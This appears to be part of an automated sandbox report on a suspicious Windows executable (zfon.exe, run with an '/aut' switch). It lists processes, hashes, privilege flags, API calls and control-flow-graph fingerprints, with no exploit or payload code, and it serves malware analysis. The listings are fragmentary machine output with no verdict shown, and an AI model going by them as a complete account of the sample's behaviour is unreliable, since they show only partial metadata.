                                                                                                                                                                          File size:570'736 bytes
                                                                                                                                                                          MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:15
                                                                                                                                                                          Start time:07:06:50
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:explorer.exe
                                                                                                                                                                          Imagebase:0x7ff62d7d0000
                                                                                                                                                                          File size:5'141'208 bytes
                                                                                                                                                                          MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:high
                                                                                                                                                                          Has exited:false

                                                                                                                                                                          Target ID:22
                                                                                                                                                                          Start time:07:07:01
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true

                                                                                                                                                                          Target ID:25
                                                                                                                                                                          Start time:07:07:02
                                                                                                                                                                          Start date:18/12/2024
                                                                                                                                                                          Path:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe
                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                          Commandline:C:\Users\user\6b703e49-a328-4b2a-8c9e-0182cbf91c57\zfon.exe /aut
                                                                                                                                                                          Imagebase:0x7ff79cfb0000
                                                                                                                                                                          File size:2'659'840 bytes
                                                                                                                                                                          MD5 hash:44AD77338A945FE1451861B59267A68D
                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Has exited:true


                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:9.1%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:78
                                                                                                                                                                            Total number of Limit Nodes:4

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0103AF7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 53623b27cca8884e89c49c5fe85511126de7d4b27d5db739ff45c2ef6b3b4317
                                                                                                                                                                            • Instruction ID: b67c2006619b7fa53e7a0f390783c27c5d402bec4506508a92a6722ae1222269
                                                                                                                                                                            • Opcode Fuzzy Hash: 53623b27cca8884e89c49c5fe85511126de7d4b27d5db739ff45c2ef6b3b4317
                                                                                                                                                                            • Instruction Fuzzy Hash: EB714370A00B05CFE765DF2AD44579ABBF5BF88304F00892ED48ACBA50DB35E8058B91

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 57 10358ec-103596c 58 103596f-10359b9 CreateActCtxA 57->58 60 10359c2-1035a1c 58->60 61 10359bb-10359c1 58->61 68 1035a2b-1035a2f 60->68 69 1035a1e-1035a21 60->69 61->60 70 1035a31-1035a3d 68->70 71 1035a40 68->71 69->68 70->71 72 1035a41 71->72 72->72
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 010359A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 319f20ae35c4215cf4876eebce5445d6854cc842369dc5037de2c8f645945139
                                                                                                                                                                            • Instruction ID: 6a75211cb46fa2fc7694ceaaf35cc1e0cc01e53980f4ce86839064f034078268
                                                                                                                                                                            • Opcode Fuzzy Hash: 319f20ae35c4215cf4876eebce5445d6854cc842369dc5037de2c8f645945139
                                                                                                                                                                            • Instruction Fuzzy Hash: E04101B0D00719CFDB24DFA9C884BCDBBB5BF85714F20806AC408AB255DB756946CF90

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 74 10344b0-10359b9 CreateActCtxA 78 10359c2-1035a1c 74->78 79 10359bb-10359c1 74->79 86 1035a2b-1035a2f 78->86 87 1035a1e-1035a21 78->87 79->78 88 1035a31-1035a3d 86->88 89 1035a40 86->89 87->86 88->89 90 1035a41 89->90 90->90
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 010359A9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 92 1035a64-1035a6f 94 1035ae9-1035b03 92->94
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 96 103b710-103d694 DuplicateHandle 98 103d696-103d69c 96->98 99 103d69d-103d6ba 96->99 98->99
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0103D5C6,?,?,?,?,?), ref: 0103D687
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 102 103d5f9-103d694 DuplicateHandle 103 103d696-103d69c 102->103 104 103d69d-103d6ba 102->104 103->104
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0103D5C6,?,?,?,?,?), ref: 0103D687
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 107 103af18-103af58 108 103af60-103af8b GetModuleHandleW 107->108 109 103af5a-103af5d 107->109 110 103af94-103afa8 108->110 111 103af8d-103af93 108->111 109->108 111->110
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0103AF7E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            control_flow_graph 916 9d30012-9d30060 918 9d30200-9d3020d 916->918 919 9d30066-9d30077 916->919 920 9d30079 919->920 921 9d3007e-9d30094 919->921 920->921 924 9d301cb-9d301e6 921->924 925 9d3009a-9d300a5 921->925 928 9d301ed-9d301f3 924->928 926 9d300ab-9d300c6 925->926 927 9d301e8 925->927 931 9d30191-9d30199 926->931 932 9d300cc-9d300d2 926->932 927->928 929 9d301f5 928->929 930 9d301fd 928->930 929->930 930->918 931->927 934 9d3019b-9d301ae 931->934 932->931 933 9d300d8-9d30134 932->933 938 9d3013e-9d30147 933->938 934->927 935 9d301b0-9d301c5 934->935 935->924 935->925 939 9d3014e-9d30153 938->939 940 9d30155-9d3015f 939->940 941 9d30189 939->941 943 9d30161-9d30167 940->943 944 9d30177-9d3017b 940->944 941->931 945 9d3016b-9d3016d 943->945 946 9d30169 943->946 944->941 947 9d3017d-9d3017f 944->947 945->944 946->944 947->941
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993977790.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fed000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993877123.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fdd000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: c411dead093924799beefd2555a758610a519d90dc3b945168fb324c204be28d
                                                                                                                                                                            • Instruction ID: 5523ccf3cbb270e3af4eb05fefababf796a46034bf3b443cb05f448c54398568
                                                                                                                                                                            • Opcode Fuzzy Hash: c411dead093924799beefd2555a758610a519d90dc3b945168fb324c204be28d
                                                                                                                                                                            • Instruction Fuzzy Hash: 36018F714043489BE7109A65C884B66BF99EF81775F28C51AED4D4A382C769D840DAF2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d3cc9aa69a75aebb105a88887907b700c7b96773227d937ef1facf77a292484c
                                                                                                                                                                            • Instruction ID: 6f303cfea03039ad18a42e8d9f3243aa720cacf4d0beabcee21b2a6f9d0c238d
                                                                                                                                                                            • Opcode Fuzzy Hash: d3cc9aa69a75aebb105a88887907b700c7b96773227d937ef1facf77a292484c
                                                                                                                                                                            • Instruction Fuzzy Hash: 530149352493868FC302AF68D404A967FF5EF86313B44C0AAE4488B232CB36CC0AC760
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1993877123.0000000000FDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FDD000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_fdd000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: eea0fcf279b9dbe8db96ac4733acacee66b6c47ae897f747f2a27b96948bd943
                                                                                                                                                                            • Instruction ID: ea6390a02b7fdbe13cbe76f8b762c07e8ff575c8329947d145d4b9a2e9f95cc7
                                                                                                                                                                            • Opcode Fuzzy Hash: eea0fcf279b9dbe8db96ac4733acacee66b6c47ae897f747f2a27b96948bd943
                                                                                                                                                                            • Instruction Fuzzy Hash: B8F0A931404344AAE7108A16C888B62FF98EB80734F28C55AED084A282C378A844CAA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 75d3ccd5354177398a1925ed1061c796d56abfc4ad70890d96fdd43f8fba45e9
                                                                                                                                                                            • Instruction ID: ff9af220765c4a0633a0d36337ae0007c6c1a09303601da9b7320e612f150673
                                                                                                                                                                            • Opcode Fuzzy Hash: 75d3ccd5354177398a1925ed1061c796d56abfc4ad70890d96fdd43f8fba45e9
                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0A03170A7515FE326AB6AAC1046ABBAECEC2612788C8BBE449C7651C925D8028791
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: d44e1bd954f9aa0ea9be7df461dbe22c3969de8efad9c528b3b191632dd1f0aa
                                                                                                                                                                            • Instruction ID: 5c1ce3e8808e7a7b399f90b14c7c506c7a807b9a0243ba88faa481a976157705
                                                                                                                                                                            • Opcode Fuzzy Hash: d44e1bd954f9aa0ea9be7df461dbe22c3969de8efad9c528b3b191632dd1f0aa
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE026323093415FC2226156BC00B977BAEDBC6712F0904AFE1819B781CD26A805C7E1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 4ef2db8c1ed843e60f23dc46189d103249f7d4874bf75616b46b002719569970
                                                                                                                                                                            • Instruction ID: 084f0f933b92b348660190845fff133f6e067f0748e7892a33ebead44cf61ee0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4ef2db8c1ed843e60f23dc46189d103249f7d4874bf75616b46b002719569970
                                                                                                                                                                            • Instruction Fuzzy Hash: 66D02E3230021593C221118AB800B6BB3AEEBC6A23F04002EE2468B780CE7B9C0583E0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 67be68f652ab6b70e4e0ba03e8677c02656778bb3b85293237abaeece653afd5
                                                                                                                                                                            • Instruction ID: a01843e7e00783326182e3fb32c7c6125a86ef79bca385732d1e8a7b0c5992e0
                                                                                                                                                                            • Opcode Fuzzy Hash: 67be68f652ab6b70e4e0ba03e8677c02656778bb3b85293237abaeece653afd5
                                                                                                                                                                            • Instruction Fuzzy Hash: 57E04FF1D44309ABDB40EFB9C90639EBFF0AB04240F4048AAC400E7605EB748204CF40
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 480471073d79261907ffef308d8cfa03837a5dc650884ec7b630b20df112bc40
                                                                                                                                                                            • Instruction ID: 19d37f9f6bd864437524e7acb225369b3062ab7e205a7833127ca3b1fa59f98d
                                                                                                                                                                            • Opcode Fuzzy Hash: 480471073d79261907ffef308d8cfa03837a5dc650884ec7b630b20df112bc40
                                                                                                                                                                            • Instruction Fuzzy Hash: E1E0C2BA84CB0007D3A88B29E8213A67AD2EF88301F09843FD08AC1294DB3404098A45
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2007489390.0000000009D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D30000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_9d30000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 3dd13dca9223dd49dcf4b3c30aeeca3fa7e978eafb06582bee9e3e44e3ca55d9
                                                                                                                                                                            • Instruction ID: c4f1df21102c48d798c5087675fa933819ed3db0574ca79145d6c38fd3988e3f
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dd13dca9223dd49dcf4b3c30aeeca3fa7e978eafb06582bee9e3e44e3ca55d9
                                                                                                                                                                            • Instruction Fuzzy Hash: 60D067B0D8431AEEDB40EFB9C90579EBFF4AB08640F90896AC415E7641EBB452448F91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1994320772.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_1030000_nrGkqbCyKP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9585460bee175968007905f5c05b27f5d91b13019e3a0cc8d05253ea6c67fb5b
                                                                                                                                                                            • Instruction ID: f1576299ac0702bc9ef0e62765c7b550396623f4b84ed5d48fa70dcbfa46ddc2
                                                                                                                                                                            • Opcode Fuzzy Hash: 9585460bee175968007905f5c05b27f5d91b13019e3a0cc8d05253ea6c67fb5b
                                                                                                                                                                            • Instruction Fuzzy Hash: B4A17136E002168FCF05DFB4C8949DEBBB6FFC5300B1545AAE901AB265DB71D916CB40

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:0.4%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                            Signature Coverage:0.5%
                                                                                                                                                                            Total number of Nodes:199
                                                                                                                                                                            Total number of Limit Nodes:5

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initstd::ios_base::_$AddstdExceptionThrowfputwcfwritestd::ios_base::failure::failurestd::locale::_
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 247381371-1866435925
                                                                                                                                                                            • Opcode ID: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                                                                                            • Instruction ID: 93fa0911a75f695991057169d146ed34935ad19a91ecc8cbaab9bb04efc0ed00
                                                                                                                                                                            • Opcode Fuzzy Hash: 35a38cbc79ebcab4b9ad5f99447ef1bcd6ff45df82ca40ad9567068bb31a2069
                                                                                                                                                                            • Instruction Fuzzy Hash: B971C1B6608A4286EB10CF35D0902AE33A0FB44B88F84A032EB4E77B54DF3DD555CB50

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFacet_RegisterThrow_lock_localesctypestd::_std::bad_alloc::bad_alloc
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2716750221-0
                                                                                                                                                                            • Opcode ID: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                                                                                            • Instruction ID: 11ca1d8e91cad432378a3d6abcdd3ec4474e212d9bf1466033f962572fcedd7a
                                                                                                                                                                            • Opcode Fuzzy Hash: f00470ad906fe360da248e588a27599a9484419fa2c40968de4492c9eddb5e12
                                                                                                                                                                            • Instruction Fuzzy Hash: 5A3195B9A0CA02C2EB14DF35E4500BB63A0FB947A0F586232D65D337E6DE2CE4518B04

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: cef_string_map_allocmalloc$ConsoleCtrlHandleHandlerModuleSleepfree
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1258940858-0
                                                                                                                                                                            • Opcode ID: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                                                                                            • Instruction ID: 78e7ae140167701a495b85cd61d4814a91b9d3e42dd23cd5a88623f4a86b2346
                                                                                                                                                                            • Opcode Fuzzy Hash: dc478c8a1e166cfd27b1d6fdbd315b0fda1f1455c4cdc7fbf417cc152726f5e5
                                                                                                                                                                            • Instruction Fuzzy Hash: 11219D22F4C24342FE34B735A4512B9E6B39F84780FD80475EA8D47297EF2CE48586B1

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            APIs
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorExceptionFileLastThrowView
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2958022518-0
